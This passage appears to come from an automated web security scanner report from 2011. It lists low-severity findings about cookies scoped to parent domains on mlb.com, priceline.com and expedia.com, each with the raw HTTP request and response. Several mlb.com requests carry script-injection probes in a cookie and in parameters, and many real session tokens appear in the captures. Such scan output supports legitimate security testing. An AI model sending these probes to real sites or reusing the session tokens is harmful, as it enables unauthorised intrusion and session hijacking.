5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D4663010a5564010a20111003003755e18011569968%26key%3Dgtaqdik9%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=131760243799780739 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:41 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fsserver__SESSION__=s-5201.estara.com; path=/fs; domain=.estara.com
Set-Cookie: fsserver__SESSION____SECURE__=s-5201.estara.com; path=/fs; domain=.estara.com; secure
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8iYRfBnjTm0AKidBJJtijrikiNQKoSbqAbREwl5IF4OIJ.KJeqKekCc0SAYVI1V0Ulo0cqowUloxyC4aSSDB3A7RSbnSo9IqBkFP0AhJTqOgphyDcY-KRvmTklrwoXpwUUF9cMmmyZm8c0yvznFyjpOzeufSQvH9FOsAIoYx0qbMJkxHhOmIMBUWfGGCEVwdVY08BnF5u-JMJ6buRpSP7hXhPw__; expires=Sat, 01-Oct-2016 00:40:41 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:40:41 GMT
Content-Length: 26085
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...

13.3. https://secure.mlb.com/resetPassword.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...

13.4. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.env.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/scripts/bam/bam.env.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:42 GMT
Expires: Mon, 03 Oct 2011 01:48:42 GMT
Edge-control: max-age=7200
Content-type: text/javascript;charset=ISO-8859-1
Content-length: 811
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/


(function (window, $, bam) {

bam.env = bam.env || {};
bam.env.host = bam.env.host || {};

$.extend(bam.env.host, {

/**
* Returns base url for the CDN server

...[SNIP]...

13.5. https://secure.mlb.com/style/bam.css.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/bam.css.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/bam.css.jsp?c_id=%0Adocument.title=1317599335378049; HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:58 GMT
Expires: Mon, 03 Oct 2011 01:48:58 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 9935


/* buttons */
/* global */
.bam-button {
font-family:"Helvetica", "Helvetica Neue", arial, sans-serif;
font-size:13px;
font-weight:bold;
text-decoration:none;
-moz-border-r
...[SNIP]...

13.6. https://secure.mlb.com/style/nav_2011.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:59 GMT
Expires: Mon, 03 Oct 2011 01:48:59 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 16918


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...

13.7. http://travela.priceline.com/hotel/leaveBehindPop.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/leaveBehindPop.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/leaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=1&country=US&static=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600744165:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.2.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:26 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a2011100300322608e011577265; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=93E8720C5EB8B62C63F1FFE2A3CCE4FE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 959
Content-Type: text/html;charset=ISO-8859-1

<html>
<head>

<script language="Javascript">
function checkDom() {
   var sTest = "";
   var newURL;
   var thisURL = window.location.href;
   var bSecSwap = true;
   try{
       sTest = window.opener.doc
...[SNIP]...

13.8. http://travela.priceline.com/hotel/searchHotels.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...

13.9. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:02 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:17:52 GMT; Path=/
Content-Length: 426876

<!DOCTYPE html>
<!-- rendered by MVC -->
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="language" content=""/>

<m
...[SNIP]...

13.10. http://www.expedia.com/Details

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Details

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=f80a6253-97ca-4b75-98ff-8895038babf3 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/TripPreferences?tripid=e0ec7dc7-accc-4a30-b5fb-7781275b132a&c=d8e96adc-f4c8-4481-b77d-30afb9785c2c
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:14 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:14 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`user=v.8,0,EX01E9F091F9$22$87001000$FF$5C37$0E$C1$C6!2$0E$C1$C6!2$0E$C1$C6$0E1000$11000$1E81!90$D1$9C$B9$EE$B3$32p$A2!i02000`125; Domain=.expedia.com; Path=/
Set-Cookie: p1=`accttype=v.2,8,1,EX014BD1106A$B48SBjmv$E3$7B$1Es$A7$BD3$18$E3$7D$14$5CM$B56$8F$E0j$13$F9$CBG$E6$F7v$A6`minfo=v.5,EX01EEEB4066$B48SBymv$FCb$10s$A7$BE3$18$E3$7D$14RM$B76$8F$E6j$13$FA$CEG$E6$F0v$916$3E$1Bn$2B$7D$2A$87$92$E2$FE$19$35$17Wf$0Bi$15$EC$26b$A33$93z$1Fd$871$12$3CM$7E`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247906574|1033|0|0||0|0|0|-1|-1`382; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:11:05 GMT; Path=/


13.11. http://www.expedia.com/Hotel-Search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Hotel-Search HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 9102
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

piid=6da35fba-7158-407e-a148-c2d242f8e3c3&hart=16706&pqar=441.86&pqtr=&oldr=bGxpdmBu&rfrr=-56908&hwrq=EX013A5C34E0DNGD110300%2429%24AF008Tq%249C%24ADH%24CB%2492%241B%24B7%2415%2495%242C%24D9O%24EC%24B
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=86f50a38-52dd-41f7-9a0a-0e0cc39da211
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:16 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:09 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:10:59 GMT; Path=/


13.12. http://www.expedia.com/Hotel-Search-WidgetInitJS

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search-WidgetInitJS

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotel-Search-WidgetInitJS?action=widgetInitJS&v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=00,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:28 GMT
Content-Length: 101505
Connection: close
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:28 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:42:18 GMT; Path=/

